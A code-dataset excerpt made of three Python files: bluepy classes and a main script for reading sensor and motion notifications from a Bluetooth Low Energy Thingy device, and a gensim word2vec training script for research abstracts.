and its characteristics. 
global temperature_handle global pressure_handle global humidity_handle global gas_handle global color_handle if self.environment_service is None: self.environment_service = self.periph.getServiceByUUID(self.serviceUUID) if self.temperature_char is None: self.temperature_char = self.environment_service.getCharacteristics(self.temperature_char_uuid)[0] temperature_handle = self.temperature_char.getHandle() self.temperature_cccd = self.temperature_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.pressure_char is None: self.pressure_char = self.environment_service.getCharacteristics(self.pressure_char_uuid)[0] pressure_handle = self.pressure_char.getHandle() self.pressure_cccd = self.pressure_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.humidity_char is None: self.humidity_char = self.environment_service.getCharacteristics(self.humidity_char_uuid)[0] humidity_handle = self.humidity_char.getHandle() self.humidity_cccd = self.humidity_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.gas_char is None: self.gas_char = self.environment_service.getCharacteristics(self.gas_char_uuid)[0] gas_handle = self.gas_char.getHandle() self.gas_cccd = self.gas_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.color_char is None: self.color_char = self.environment_service.getCharacteristics(self.color_char_uuid)[0] color_handle = self.color_char.getHandle() self.color_cccd = self.color_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.config_char is None: self.config_char = self.environment_service.getCharacteristics(self.config_char_uuid)[0] def set_temperature_notification(self, state): ## Enable/Disable Temperature Notifications if self.temperature_cccd is not None: if state == True: self.temperature_cccd.write(b"\x01\x00", True) else: self.temperature_cccd.write(b"\x00\x00", True) def set_pressure_notification(self, state): ## Enable/Disable Pressure Notifications if self.pressure_cccd is not None: if state == True: self.pressure_cccd.write(b"\x01\x00", True) else: 
self.pressure_cccd.write(b"\x00\x00", True) def set_humidity_notification(self, state): ## Enable/Disable Humidity Notifications if self.humidity_cccd is not None: if state == True: self.humidity_cccd.write(b"\x01\x00", True) else: self.humidity_cccd.write(b"\x00\x00", True) def set_gas_notification(self, state): ## Enable/Disable Gas Notifications if self.gas_cccd is not None: if state == True: self.gas_cccd.write(b"\x01\x00", True) else: self.gas_cccd.write(b"\x00\x00", True) def set_color_notification(self, state): ## Enable/Disable Color Notifications if self.color_cccd is not None: if state == True: self.color_cccd.write(b"\x01\x00", True) else: self.color_cccd.write(b"\x00\x00", True) def configure(self, temp_int=None, press_int=None, humid_int=None, gas_mode_int=None, color_int=None, color_sens_calib=None): if temp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, temp_int, 0) self.config_char.write(binascii.a2b_hex(new_config), True) if press_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, press_int, 1) self.config_char.write(binascii.a2b_hex(new_config), True) if humid_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, humid_int, 2) self.config_char.write(binascii.a2b_hex(new_config), True) if gas_mode_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, gas_mode_int, 8) self.config_char.write(binascii.a2b_hex(new_config), True) if color_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, color_int, 3) self.config_char.write(binascii.a2b_hex(new_config), True) if 
color_sens_calib is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, color_sens_calib[0], 9) new_config = write_uint8(current_config, color_sens_calib[1], 10) new_config = write_uint8(current_config, color_sens_calib[2], 11) self.config_char.write(binascii.a2b_hex(new_config), True) def disable(self): ## Disable Environment Notifications self.set_temperature_notification(False) self.set_pressure_notification(False) self.set_humidity_notification(False) self.set_gas_notification(False) self.set_color_notification(False) class BatterySensor(): ##Battery Service module. Instance the class and enable to get access to Battery interface. svcUUID = UUID(BATTERY_SERVICE_UUID) # Ref https://www.bluetooth.com/specifications/gatt/services dataUUID = UUID(BATTERY_LEVEL_UUID) # Ref https://www.bluetooth.com/specifications/gatt/characteristics def __init__(self, periph): self.periph = periph self.service = None self.data = None self.data_cccd = None def enable(self): ##Enables the class by finding the service and its characteristics. global battery_handle if self.service is None: self.service = self.periph.getServiceByUUID(self.svcUUID) if self.data is None: self.data = self.service.getCharacteristics(self.dataUUID)[0] battery_handle = self.data.getHandle() self.data_cccd = self.data.getDescriptors(forUUID=CCCD_UUID)[0] def b_read(self): ## Returns the battery level in percent val = ord(self.data.read()) return val def set_battery_notification(self, state): ## Enable/Disable Battery Notifications if self.data_cccd is not None: if state == True: self.data_cccd.write(b"\x01\x00", True) else: self.data_cccd.write(b"\x00\x00", True) def disable(self): ## Disable Battery Notifications self.set_battery_notification(False) class UserInterfaceService(): """ User interface service module. Instance the class and enable to get access to the UI interface. 
""" serviceUUID = USER_INTERFACE_SERVICE_UUID led_char_uuid = LED_CHAR_UUID btn_char_uuid = BUTTON_CHAR_UUID # To be added: EXT PIN CHAR def __init__(self, periph): self.periph = periph self.ui_service = None self.led_char = None self.btn_char = None self.btn_char_cccd = None # To be added: EXT PIN CHAR def enable(self): """ Enables the class by finding the service and its characteristics. """ global button_handle if self.ui_service is None: self.ui_service = self.periph.getServiceByUUID(self.serviceUUID) if self.led_char is None: self.led_char = self.ui_service.getCharacteristics(self.led_char_uuid)[0] if self.btn_char is None: self.btn_char = self.ui_service.getCharacteristics(self.btn_char_uuid)[0] button_handle = self.btn_char.getHandle() self.btn_char_cccd = self.btn_char.getDescriptors(forUUID=CCCD_UUID)[0] def set_led_mode_off(self): self.led_char.write(b"\x00", True) def set_led_mode_constant(self, r, g, b): teptep = "01{:02X}{:02X}{:02X}".format(r, g, b) self.led_char.write(binascii.a2b_hex(teptep), True) def set_led_mode_breathe(self, color, intensity, delay): """ Set LED to breathe mode. color has to be within 0x01 and 0x07 intensity [%] has to be within 1-100 delay [ms] has to be within 1 ms - 10 s """ teptep = "02{:02X}{:02X}{:02X}{:02X}".format(color, intensity, delay & 0xFF, delay >> 8) self.led_char.write(binascii.a2b_hex(teptep), True) def set_led_mode_one_shot(self, color, intensity): """ Set LED to one shot mode. color has to be within 0x01 and 0x07 intensity [%] has to be within 1-100 """ teptep = "03{:02X}{:02X}".format(color, intensity) self.led_char.write(binascii.a2b_hex(teptep), True) def set_button_notification(self, state): if self.btn_char_cccd is not None: if state == True: self.btn_char_cccd.write(b"\x01\x00", True) else: self.btn_char_cccd.write(b"\x00\x00", True) def disable(self): set_button_notification(False) class MotionService(): ##Motion service module. Instance the class and enable to get access to the Motion interface. 
serviceUUID = MOTION_SERVICE_UUID config_char_uuid = M_CONFIG_CHAR_UUID tap_char_uuid = TAP_CHAR_UUID orient_char_uuid = ORIENTATION_CHAR_UUID quaternion_char_uuid = QUATERNION_CHAR_UUID stepcnt_char_uuid = STEP_COUNTER_CHAR_UUID rawdata_char_uuid = RAW_DATA_CHAR_UUID euler_char_uuid = EULER_CHAR_UUID rotation_char_uuid = ROTATION_MATRIX_CHAR_UUID heading_char_uuid = HEADING_CHAR_UUID gravity_char_uuid = GRAVITY_VECTOR_CHAR_UUID def __init__(self, periph): self.periph = periph self.motion_service = None self.config_char = None self.tap_char = None self.tap_char_cccd = None self.orient_char = None self.orient_cccd = None self.quaternion_char = None self.quaternion_cccd = None self.stepcnt_char = None self.stepcnt_cccd = None self.rawdata_char = None self.rawdata_cccd = None self.euler_char = None self.euler_cccd = None self.rotation_char = None self.rotation_cccd = None self.heading_char = None self.heading_cccd = None self.gravity_char = None self.gravity_cccd = None def enable(self): ##Enables the class by finding the service and its characteristics. 
global tap_handle global orient_handle global quaternion_handle global stepcount_handle global rawdata_handle global euler_handle global rotation_handle global heading_handle global gravity_handle if self.motion_service is None: self.motion_service = self.periph.getServiceByUUID(self.serviceUUID) if self.config_char is None: self.config_char = self.motion_service.getCharacteristics(self.config_char_uuid)[0] if self.tap_char is None: self.tap_char = self.motion_service.getCharacteristics(self.tap_char_uuid)[0] tap_handle = self.tap_char.getHandle() self.tap_char_cccd = self.tap_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.orient_char is None: self.orient_char = self.motion_service.getCharacteristics(self.orient_char_uuid)[0] orient_handle = self.orient_char.getHandle() self.orient_cccd = self.orient_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.quaternion_char is None: self.quaternion_char = self.motion_service.getCharacteristics(self.quaternion_char_uuid)[0] quaternion_handle = self.quaternion_char.getHandle() self.quaternion_cccd = self.quaternion_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.stepcnt_char is None: self.stepcnt_char = self.motion_service.getCharacteristics(self.stepcnt_char_uuid)[0] stepcount_handle = self.stepcnt_char.getHandle() self.stepcnt_cccd = self.stepcnt_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.rawdata_char is None: self.rawdata_char = self.motion_service.getCharacteristics(self.rawdata_char_uuid)[0] rawdata_handle = self.rawdata_char.getHandle() self.rawdata_cccd = self.rawdata_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.euler_char is None: self.euler_char = self.motion_service.getCharacteristics(self.euler_char_uuid)[0] euler_handle = self.euler_char.getHandle() self.euler_cccd = self.euler_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.rotation_char is None: self.rotation_char = self.motion_service.getCharacteristics(self.rotation_char_uuid)[0] rotation_handle = self.rotation_char.getHandle() 
self.rotation_cccd = self.rotation_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.heading_char is None: self.heading_char = self.motion_service.getCharacteristics(self.heading_char_uuid)[0] heading_handle = self.heading_char.getHandle() self.heading_cccd = self.heading_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.gravity_char is None: self.gravity_char = self.motion_service.getCharacteristics(self.gravity_char_uuid)[0] gravity_handle = self.gravity_char.getHandle() self.gravity_cccd = self.gravity_char.getDescriptors(forUUID=CCCD_UUID)[0] def set_tap_notification(self, state): if self.tap_char_cccd is not None: if state == True: self.tap_char_cccd.write(b"\x01\x00", True) else: self.tap_char_cccd.write(b"\x00\x00", True) def set_orient_notification(self, state): if self.orient_cccd is not None: if state == True: self.orient_cccd.write(b"\x01\x00", True) else: self.orient_cccd.write(b"\x00\x00", True) def set_quaternion_notification(self, state): if self.quaternion_cccd is not None: if state == True: self.quaternion_cccd.write(b"\x01\x00", True) else: self.quaternion_cccd.write(b"\x00\x00", True) def set_stepcount_notification(self, state): if self.stepcnt_cccd is not None: if state == True: self.stepcnt_cccd.write(b"\x01\x00", True) else: self.stepcnt_cccd.write(b"\x00\x00", True) def set_rawdata_notification(self, state): if self.rawdata_cccd is not None: if state == True: self.rawdata_cccd.write(b"\x01\x00", True) else: self.rawdata_cccd.write(b"\x00\x00", True) def set_euler_notification(self, state): if self.euler_cccd is not None: if state == True: self.euler_cccd.write(b"\x01\x00", True) else: self.euler_cccd.write(b"\x00\x00", True) def set_rotation_notification(self, state): if self.rotation_cccd is not None: if state == True: self.rotation_cccd.write(b"\x01\x00", True) else: self.rotation_cccd.write(b"\x00\x00", True) def set_heading_notification(self, state): if self.heading_cccd is not None: if state == True: self.heading_cccd.write(b"\x01\x00", 
True) else: self.heading_cccd.write(b"\x00\x00", True) def set_gravity_notification(self, state): if self.gravity_cccd is not None: if state == True: self.gravity_cccd.write(b"\x01\x00", True) else: self.gravity_cccd.write(b"\x00\x00", True) def configure(self, step_int=None, temp_comp_int=None, magnet_comp_int=None, motion_freq=None, wake_on_motion=None): if step_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, step_int, 0) self.config_char.write(binascii.a2b_hex(new_config), True) if temp_comp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, temp_comp_int, 1) self.config_char.write(binascii.a2b_hex(new_config), True) if magnet_comp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, magnet_comp_int, 2) self.config_char.write(binascii.a2b_hex(new_config), True) if motion_freq is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, motion_freq, 3) self.config_char.write(binascii.a2b_hex(new_config), True) if wake_on_motion is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, wake_on_motion, 8) self.config_char.write(binascii.a2b_hex(new_config), True) def disable(self): set_tap_notification(False) set_orient_notification(False) set_quaternion_notification(False) set_stepcount_notification(False) set_rawdata_notification(False) set_euler_notification(False) set_rotation_notification(False) set_heading_notification(False) set_gravity_notification(False)
Python
1,125
37.344891
213
/Services.py
0.537547
0.500116
Nimunex/TFG
refs/heads/master
## Main: connect to a BLE device, bond, enable its services, and stream
## motion (Euler-angle) notifications until interrupted with Ctrl-C.
from bluepy import btle
from bluepy.btle import Peripheral, DefaultDelegate
import os.path
import struct
import binascii
import sys
import datetime
import time
from time import time, sleep
import Services
from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate
import Device
from Device import Device
from urllib.request import urlopen

## Known device MAC addresses:
## Mac 1: FD:88:50:58:E7:45
## Mac 2: E4:F6:C5:F7:03:39

global MAC  # no-op at module scope; retained from the original source

if __name__ == "__main__":
    # First CLI argument is the target device's MAC address.
    MAC = str(sys.argv[1])

    print("Connecting to " + MAC)
    thingy = Device(MAC)
    print("Connected...")

    print("Bonding...")
    thingy.setSecurityLevel("medium")
    print("Bonded...")

    print("Enabling Services...")
    thingy.battery.enable()
    #~ thingy.ui.enable()
    thingy.motion.enable()
    thingy.setDelegate(DeviceDelegate())
    print('Services Enabled...')

    print('Battery Level(1): ', thingy.battery.b_read(), '%')

    #~ thingy.ui.set_led_mode_breathe(0x02, 50, 1000)
    ## Battery sensor
    #~ thingy.battery.set_battery_notification(True)
    ## UI service
    #~ thingy.ui.set_button_notification(True)

    ## Motion services: sample at 5 Hz, subscribe to Euler angles only.
    thingy.motion.configure(motion_freq=5)
    #~ thingy.motion.set_tap_notification(True)
    #~ thingy.motion.set_orient_notification(True)
    #~ thingy.motion.set_quaternion_notification(True)
    #~ thingy.motion.set_stepcount_notification(True)
    #~ thingy.motion.set_rawdata_notification(True)
    thingy.motion.set_euler_notification(True)
    #~ thingy.motion.set_rotation_notification(True)
    #~ thingy.motion.set_heading_notification(True)
    #~ thingy.motion.set_gravity_notification(True)

    try:
        while True:
            # handleNotification() was called when this returns truthy.
            if thingy.waitForNotifications(180.0):
                continue
            print("Waiting...")
    except KeyboardInterrupt:
        print("Disabling Notifications and Indications...")
        thingy.battery.disable()
        thingy.ui.disable()
        thingy.motion.disable()
        print("Notifications and Indications Disabled...")
        print("Device Session Finished...")
Python
94
23.521276
107
/mainMotion.py
0.649892
0.624295
rafunchik/shrimps
refs/heads/master
# coding=utf-8
"""Train a word2vec model on research abstracts.

Review fixes applied to the original script:
- Python 2 ``print`` statements (``print "x"``) converted to ``print()``
  calls, matching the py3-style calls the file already used elsewhere.
- ``TfidfVectorizer`` was referenced without being imported; the scikit-learn
  dependency the script already relied on is now imported explicitly.
- ``sentences.append( )`` appended nothing -- the sentence-to-wordlist step
  the adjacent comment describes is now implemented.
- ``max_df=1`` is an *absolute* document count, discarding every term that
  appears in more than one document; ``max_df=1.0`` (a proportion) is almost
  certainly what was intended.
"""
import codecs
import re

from abstract import Abstract

__author__ = 'rcastro'

from gensim.models import Word2Vec
from codecs import open
import nltk
# nltk.download()  # download text data sets, including stop words
from nltk.corpus import stopwords  # stop word list
import numpy as np
# NOTE(review): missing in the original although TfidfVectorizer was used.
from sklearn.feature_extraction.text import TfidfVectorizer

# model = Word2Vec.load_word2vec_format(
#     "/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin",
#     binary=True)
# print(model.most_similar('Crayfish', topn=5))

print("get the abstracts")
text = ''
try:
    with codecs.open('/Users/rcastro/dev/abstracts.txt', 'r', encoding='utf8') as abstracts_file:
        text = abstracts_file.read().strip()
except IOError as e:
    print('Operation failed: %s' % e.strerror)

# Abstracts are separated by blank CRLF lines in the dump.
abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
num_reviews = len(abstracts)
clean_train_reviews = [x.text for x in abstracts]


def remove_numeric_tokens(string):
    """Replace numeric tokens (digits plus trailing separators) with a space."""
    return re.sub(r'\d+[^\w|-]+', ' ', string)


vectorizer = TfidfVectorizer(analyzer="word",
                             tokenizer=None,
                             preprocessor=remove_numeric_tokens,
                             stop_words='english',
                             lowercase=True,
                             ngram_range=(1, 2),
                             min_df=1,
                             max_df=1.0,  # was 1 (absolute count); maybe try 0.8
                             token_pattern=r"(?u)\b[\w][\w|-]+\b",
                             max_features=155000)
analyzer = vectorizer.build_analyzer()
review_lists = [analyzer(w) for w in clean_train_reviews]

# Punkt tokenizer for sentence splitting.
import nltk.data

tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')


def review_to_wordlist(review, remove_stopwords=True):
    """Split one sentence into lowercase word tokens.

    Uses the same token pattern as the vectorizer above; optionally drops
    English stop words.
    """
    words = re.findall(r"(?u)\b[\w][\w|-]+\b", review.lower())
    if remove_stopwords:
        stops = set(stopwords.words("english"))
        words = [w for w in words if w not in stops]
    return words


def review_to_sentences(review, tokenizer, remove_stopwords=True):
    """Split a review into parsed sentences.

    Returns a list of sentences, where each sentence is a list of words.
    """
    # 1. Use the NLTK tokenizer to split the paragraph into sentences.
    raw_sentences = tokenizer.tokenize(review.strip())
    # 2. Convert each non-empty sentence to a word list.
    sentences = []
    for raw_sentence in raw_sentences:
        if len(raw_sentence) > 0:
            # Original had ``sentences.append( )`` -- an empty append; the
            # intended word-list conversion is now performed.
            sentences.append(review_to_wordlist(raw_sentence, remove_stopwords))
    return sentences


sentences = []  # list of sentences; each sentence is a list of words
print("Parsing sentences from training set")
for review in clean_train_reviews:
    sentences += review_to_sentences(review, tokenizer)

# Configure logging so Word2Vec emits nice progress messages.
import logging

logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)

# word2vec hyper-parameters
num_features = 400    # word vector dimensionality
min_word_count = 1    # minimum word count
num_workers = 4       # number of threads to run in parallel
context = 20          # context window size
downsampling = 1e-3   # downsample setting for frequent words

from gensim.models import word2vec

print("Training model...")
# bigram_transformer = gensim.models.Phrases(sentences)
# model = Word2Vec(bigram_transformer[sentences], size=100, ...)
model = word2vec.Word2Vec(sentences, workers=num_workers,
                          size=num_features, min_count=min_word_count,
                          window=context, sample=downsampling,
                          batch_words=1000)

# No further training planned: init_sims makes the model memory-efficient.
model.init_sims(replace=True)

# Save under a descriptive name; reload later with Word2Vec.load().
model_name = "400features_2minwords_20context"
model.save(model_name)

print(model.doesnt_match("man woman child kitchen".split()))
print(model.doesnt_match("france england germany berlin".split()))
print(model.most_similar("prawn", topn=10))
Python
117
35.53846
130
/word2vec.py
0.66963
0.656762